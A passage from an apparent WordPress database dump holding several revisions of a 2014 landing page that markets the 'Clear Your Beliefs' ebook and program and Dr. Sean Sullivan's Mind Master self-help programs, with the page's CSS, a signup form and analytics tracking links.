padding-top:22px;\r\n\r\n}\r\n\r\n\r\n\r\n#step1_button{\r\n\r\n	width: 100%;\r\n\r\n	/*height:86px;*/\r\n\r\n	text-align:center;\r\n\r\n	margin-top:105px;\r\n\r\n}\r\n\r\n#step1_button2{\r\n\r\n	width: 100%;\r\n\r\n	height:86px;\r\n\r\n	text-align:center;\r\n\r\n	margin-top:155px;\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n.step1b{\r\n\r\n	width:265px;\r\n\r\n	height:363px;\r\n\r\n	float:left;\r\n\r\n	background-image:url(images/step11.png);\r\n\r\n	background-repeat:no-repeat;\r\n\r\n}\r\n\r\n\r\n\r\n.step1b h1{\r\n\r\n	font-family:Arial, Helvetica, sans-serif;\r\n\r\n	font-size:20px;\r\n\r\n	font-weight:normal;\r\n\r\n	color:#FFF;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	margin:0px;\r\n\r\n	padding-top:10px;\r\n\r\n}\r\n\r\n\r\n\r\n.step1b h2{\r\n\r\n	font-family: "MyriadPro-Black";\r\n\r\n	font-size:22px;\r\n\r\n	font-weight:normal;\r\n\r\n	color:#fff;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	line-height:40px;\r\n\r\n	margin:0px;\r\n\r\n	padding-top:50px;\r\n\r\n}\r\n\r\n\r\n\r\n#step1_buttonb{\r\n\r\n	width: 100%;\r\n\r\n	height:86px;\r\n\r\n	text-align:center;\r\n\r\n	margin-top:155px;\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n.step2{\r\n\r\n	width:265px;\r\n\r\n	height:363px;\r\n\r\n	float:left;\r\n\r\n	background-image:url(images/step2.png);\r\n\r\n	background-repeat:no-repeat;\r\n\r\n	margin-left:5px;\r\n\r\n}\r\n\r\n\r\n\r\n.step2 h1{\r\n\r\n	font-family:Arial, Helvetica, sans-serif;\r\n\r\n	font-size:20px;\r\n\r\n	font-weight:normal;\r\n\r\n	color:#FFF;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n		margin:0px;\r\n\r\n	padding-top:10px;\r\n\r\n\r\n\r\n}\r\n\r\n\r\n\r\n#mindmaster_img{\r\n\r\n	width:100%;\r\n\r\n	height:86px;\r\n\r\n	text-align:center;\r\n\r\n	margin-top:24px;\r\n\r\n}\r\n\r\n\r\n\r\n.step2 h2{\r\n\r\n	font-family: "MyriadPro-Black";\r\n\r\n	font-size:20px;\r\n\r\n	font-weight:bold;\r\n\r\n	color:#b30041;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	margin:0px;\r\n\r\n	line-height:22px;\r\n\r\n	padding-top:12px;\r\n\r\n}\r\n\r\n\r\n\r\n#button{\r\n\r\n	width:100%;\r\n\r\n	height:110px;\r\n\r\n	margin-top:15px;\r\n\r\n}\r\n\r\n\r\n\r\n.step2_buttons{\r\n\r\n	width: 100%;\r\n\r\n	height:52px;\r\n\r\n	text-align:center;\r\n\r\n	padding-top:8px;\r\n\r\n}\r\n\r\n\r\n\r\n.step3{\r\n\r\n	width:265px;\r\n\r\n	height:363px;\r\n\r\n	float:left;\r\n\r\n	background-image:url(images/step3.png);\r\n\r\n	background-repeat:no-repeat;\r\n\r\n	margin-left:5px;\r\n\r\n}\r\n\r\n\r\n\r\n.step3 h1{\r\n\r\n	font-family:Arial, Helvetica, sans-serif;\r\n\r\n	font-size:20px;\r\n\r\n	font-weight:normal;\r\n\r\n	color:#FFF;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n		margin:0px;\r\n\r\n	padding-top:10px;\r\n\r\n\r\n\r\n}\r\n\r\n\r\n\r\n#step3_img{\r\n\r\n	width:100%;\r\n\r\n	height:161px;\r\n\r\n	text-align:center;\r\n\r\n	margin-top:20px;\r\n\r\n}\r\n\r\n\r\n\r\n.step3 h2{\r\n\r\n	font-family: "myriad Pro";\r\n\r\n	font-size:19px;\r\n\r\n	font-weight:normal;\r\n\r\n	color:#000;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	line-height:24px;\r\n\r\n	margin:0px;\r\n\r\n}\r\n\r\n\r\n\r\n.step3_buttons{\r\n\r\n	width: 100%;\r\n\r\n	height:69px;\r\n\r\n	text-align:center;\r\n\r\n	padding-top:10px;\r\n\r\n}\r\n\r\n\r\n\r\n#textarea{\r\n\r\n	width:100%;\r\n\r\n	clear:both;\r\n\r\n	padding-top:40px;\r\n\r\n	background-image:url(images/text_bg1.jpg);\r\n\r\n	background-repeat:no-repeat;\r\n\r\n\r\n\r\n	min-height:500px;\r\n\r\n}\r\n\r\n\r\n\r\n.frmtext{\r\n\r\nwidth: 68px;\r\n\r\nfloat: left;\r\n\r\nmargin-top: 4px;\r\n\r\ntext-align: right;\r\n\r\ncolor:#666;}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#lefttext{\r\n\r\n	width:390px;\r\n\r\n	float:left;\r\n\r\n	font-family:''AGaramondPro'';\r\n\r\n	font-size:18px;\r\n\r\n	color:#000;\r\n\r\n	margin-top:262px;\r\n\r\n	line-height:24px;\r\n\r\n	text-align: justify;\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#heading{\r\n\r\n	width:390px;\r\n\r\n	height:55px;\r\n\r\n	float:left;\r\n\r\n}\r\n\r\n\r\n\r\n#rightside{\r\n\r\n	width:390px;\r\n\r\n	float:left;\r\n\r\n	padding-left:25px;\r\n\r\n}\r\n\r\n\r\n\r\n#leftside{\r\n\r\n	width:390px;\r\n\r\n	float:left;\r\n\r\n}\r\n\r\n#righttext{\r\n\r\n	width:390px;\r\n\r\n	float:left;\r\n\r\n	font-family:''AGaramondPro'';\r\n\r\n	font-size:18px;\r\n\r\n	color:#000;\r\n\r\n	margin-top:150px;\r\n\r\n	line-height:24px;\r\n\r\n	padding-left:25px;\r\n\r\n	text-align: justify;\r\n\r\n}\r\n\r\n\r\n\r\n.bott_heading{\r\n\r\n	font-size:24px;\r\n\r\n	font-family: "Myriad Pro Cond";\r\n\r\n	color:#b30041;\r\n\r\n	font-weight:normal;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	padding-top:20px;\r\n\r\n}\r\n\r\n\r\n\r\n#bottom_buttons{\r\n\r\nheight:66px;\r\n\r\n	text-align:center;\r\n\r\n	margin-top:30px;\r\n\r\n	padding-left:100px;\r\n\r\n	\r\n\r\n}\r\n\r\n\r\n\r\n.bott_button{\r\n\r\n	width:250px;\r\n\r\n	height:66px;\r\n\r\n	float:left;\r\n\r\n}\r\n\r\n\r\n\r\n#bott_or{\r\n\r\n	font-size:36px;\r\n\r\n	font-family: "Myriad Pro Cond";\r\n\r\n	color:#b30041;\r\n\r\n	font-weight:normal;\r\n\r\n	width:100px;\r\n\r\n	text-align:center;\r\n\r\n	float:left;\r\n\r\n	padding-top:12px;\r\n\r\n}\r\n\r\n\r\n\r\n.textarea_link{\r\n\r\n	font-family:''AGaramondPro'';\r\n\r\n	font-size:14px;\r\n\r\n	color:#b30041;\r\n\r\n	padding-top:10px;\r\n\r\n	line-height:24x;\r\n\r\n	text-align:justify;\r\n\r\n	font-style:italic;\r\n\r\n	text-decoration:underline;\r\n\r\n}\r\n\r\n.sub_footer{	width:845px;	height:100px;	margin:0 auto; padding-top:20px;}\r\n\r\n.footertop{	width:845px;	height:60px;	float:left;}.footerbottom{	width:845px;	height:20px;	float:left;}.searchbox{	width:200px;	height:25px;	float:left;	border:2px solid #cecece;	font-family:Arial;	font-size:12px;	color:#a0a0a0;	-moz-border-radius:7px;    -webkit-border-radius:7px;}.socialicon{	width:32px;	height:32px;	float:right;	margin-right:1%;}.copyright{	width:845px;	float:right;	font-family:Arial;	font-size:12px;	color:#878787;	text-align:right;	padding-right:1%;}.copyright a{color:#b30041; text-decoration:underline;}.copyright a:hover{color:#b30041; text-decoration:none;}\r\n</style>\r\n	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<p><strong>The Mind Master</strong>&#8211;Back in 2007, Harvard University graduate Sean Sullivan was a clinical psychology doctoral student completing his research on how psychology and life coaching were being delivered over the Internet.</p>\r\n<p>He discovered major gaps in the ways that psychology and coaching were being delivered online so he set out to address the problem.</p>\r\n<p>Today, the future of brain training psychology for the Internet connected world is here. &#8220;Dr. Sean&#8221; is increasingly becoming the go-to psychologist coach for the rest of us&#8211;those of us who don&#8217;t go to therapy, but do want to use cutting edge psychology and brain science to realize our potential.</p>\r\n<p>Dr. Sean&#8217;s online Mind Master Programs are based on the world&#8217;s latest neuroscience detailed in his book, <a href="http://www.amazon.com/Mind-Masters-Silent-Journey-Becoming/dp/0983495580" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.amazon.com'']);" target="_blank"><span class="textarea_link">The Mind Master&#8217;s Silent Journey, A 21-Day Road Map to Becoming Expert in Your Chosen Life</span></a>.</p>\r\n<p>He&#8217;s blended a unique stew of personal storytelling and brain science into a step-by-step online system to change the bad habits you&#8217;ve developed and maintain inside your head.</p>\r\n<p>Unabashed in using his own life as an example, Dr. Sean actually shows you how we get in our own way. A distinct personal responsibility theme runs through the 21-day programs.</p>\r\n<p>First, you uncover how and why you created your personal obstacles. Then, you walk through removing them from your life. The process is simple. But you don&#8217;t get off easy.</p>\r\n<p>You choose what aspect of your life you want to focus on improving &#8212; lose weight, get fit, become happier, master your stress or anxiety, improve or heal relationships, quit smoking &#8212; or you can join the monthly group Health Challenge and define your own personal goal to master.</p>\r\n<p>The programs include short daily videos you watch first thing in the morning on your smart phone, tablet, or computer. You&#8217;ll then complete your &#8220;Daily Ritual&#8221;&#8211; a mind and body exercise sequence that prepares your brain for your personal work for the day.</p>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>         You commit one hour each day for 21 total days of retraining your brain. It&#8217;s fine to take days or weekends off to fit your schedule.</p>\r\n<p>The promise is that by the end of your 21-day program you&#8217;ve learned and practiced all the psychological tools and skills, and also implemented all the habits necessary to master your personal goal.</p>\r\n<p>Dr. Sean&#8217;s unscripted, direct to camera videos are uncommonly personally revealing&#8211;especially in the world of professional psychology.</p>\r\n<p>Marta Wegorzewska, a Ph.D. candidate in Developmental and Stem Cell Biology, recently completed her 21-day program focused on mastering stress and anxiety. She says, &#8220;It was like having a psychologist who is your close friend sitting beside you every day. It&#8217;s so helpful and it works. I&#8217;m a scientist. I saw results.&#8221;</p>\r\n<p>You won&#8217;t set foot in a psychologist&#8217;s office or pay for a session. While <a href="http://www.drseansullivan.com/contact/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.drseansullivan.com'']);" target="_blank">Dr. Sean can be contacted</a> at his private psychotherapy practice in San Francisco, The 21-Day Mind Master Programs are accessed online or in apps.</p>\r\n<p>&#8220;The Mind Master is a do-it-yourself boot camp for your brain health and emotional intelligence. It&#8217;s important information to share,&#8221; Dr. Sean asserts. &#8220;I&#8217;ve always given the book away for free in the apps. I want it to be available to as many people as possible.&#8221;</p>\r\n<p>He&#8217;s well on his way. New York Jets Quarterback, Mark Sanchez, has commented, &#8220;Dr. Sullivan is a game changing new voice in the psychology of peak performance.&#8221;</p>\r\n<p>Mr. Sanchez is not the only one taking notice. In 2012, The Mind Master&#8217;s Map became the #1 Self Help Books app on iPad. You can now download the free <a href="https://itunes.apple.com/us/app/the-mind-masters-map-iphone/id446468278?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPhone app</span></a> and free <a href="https://itunes.apple.com/us/app/the-mind-masters-map/id441043981?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPad app</span></a> versions of the 21-day programs.</p>\r\n<p>The Mind Master is now also collaborating with health and wellness conscious organizations and employers</span></a> to deliver Group Mind Master Programs led by Dr. Sean. You can join us anytime in <a href="https://www.popexpert.com/mindmaster?code=mindmasterchallenge" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.popexpert.com'']);" target="_blank"><span class="textarea_link">The 21 Day Mind Master Health Challenge</span></a> presented with PopExpert. <a href="https://my.leadpages.net/leadbox/14158d173f72a2%3A1283fa00eb46dc/5718998062727168/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://my.leadpages.net'']);" target="_blank">Click here to be notified when The Mind Master Challenges launch.</a><script type="text/javascript" src="//my.leadpages.net/leadbox-680.js"></script></p>\r\n<p>If you&#8217;re ready to begin mastering you mind on your own right now, you can choose your <a href="http://themindmaster.com/new/featuring-prices2/"  target="_blank"><span class="textarea_link">21 Day Mind Master Program right here.</span></a></span></a></p>\r\n</div>\r\n</div>\r\n            	                    \r\n                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n/* <![CDATA[ */\r\nvar thickboxL10n = {\r\n	next: "Next &gt;",\r\n	prev: "&lt; Prev",\r\n	image: "Image",\r\n	of: "of",\r\n	close: "Close",\r\n	noiframes: "This feature requires inline frames. You have iframes disabled or your browser does not support them.",\r\n	loadingAnimation: "images/loadingAnimation.gif",\r\n	closeImage: "images/tb-close.png"\r\n};\r\ntry{convertEntities(thickboxL10n);}catch(e){};\r\n/* ]]> */\r\n</script>\r\n<script type=''text/javascript'' src=''js/thickbox/thickbox.js''></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:00:47', '2014-09-21 20:00:47', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1426, 4194, '2014-09-27 11:15:58', '2014-09-27 16:15:58', '<div id="main">\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\n<div id="three_steps">\n<div class="step1">\n<div class="stepinner">\n<h1>Clear Your Beliefs eBOOK</h1>\n<h2>DOWNLOAD THE FREE</h2>\n<h2>eBOOK</h2>\n<img class="aligncenter  wp-image-433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="120" height="155" />\n<div id="step1_button">\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\n<table border="1" cellspacing="3" cellpadding="2">\n<tbody>\n<tr>\n<td class="frmtext"><b>First Name</b></td>\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\n\n<b>Email</b>\n\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\n\n</div>\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\n\n</form></div>\n<div id="mindmaster_img"><img class="aligncenter  wp-image-1445" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/logo-globe.jpg" alt="logo-globe" width="123" height="132" /></div>\n</div>\n</div>\n</div>\n<div class="step2">\n<div class="stepinner">\n<h1>iClearIt APP</h1>\n<h2>DOWNLOAD THE</h2>\niClearIt APP\n<div id="button">\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\n</div>\n</div>\n</div>\n<div class="step3">\n<div class="stepinner">\n<h1>CLEAR YOUR BELIEFS</h1>\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\n<h2>Choose a Goal &amp;</h2>\nMaster Your Chosen Life\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\n</div>\n</div>\n</div>\n<div id="textarea">\n<div id="leftside">\n<div id="lefttext">\n<h3>What You Can Accomplish\nwith\nClear Your Beliefs</h3>\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n</div>\n</div>\n<div id="rightside">\n<div id="righttext">\n\n&nbsp;\n<h3>How and Why It Works</h3>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>\n</div>\n<div style="clear: both;"></div>\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\n<div>\n\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\n\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\n\nWarmly,\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\n\n</div>\n</div>\n<div style="clear: both;"></div>\n<div class="bott_heading">\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\n\n</div>\n<div id="bottom_buttons">\n<div class="bott_button"><a>Click HERE to Learn More</a></div>\n</div>\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-autosave-v1', '', '', '2014-09-27 11:15:58', '2014-09-27 16:15:58', '', 1421, 'http://clearyourbeliefs.com/1421-autosave-v1', 0, 'revision', '', 0),
(1429, 4194, '2014-09-21 15:30:26', '2014-09-21 20:30:26', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n<li>Beliefs are the major cause of upset and unhappiness\r\n\r\nCYB clears beliefs at the core of the psyche, where they live \r\n</li><li>\r\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\r\n</li><li>\r\nYou take charge and decide what you want to believe\r\n</li><li>\r\nYou’re guided gently, step-by-step, through the entire process \r\n</li><li>\r\nYou decide how far to go, and what changes to make\r\n</li></ul>\r\n</div>\r\n</div>\r\n            	                    \r\n<div>\r\n<p>I’m Lion Goodman, creator of the Clear Your Beliefs program.  I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen  modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.  \r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the Clear Your Beliefs program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away – like magic.  And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="">\r\n</p>\r\n</div>                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:30:26', '2014-09-21 20:30:26', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
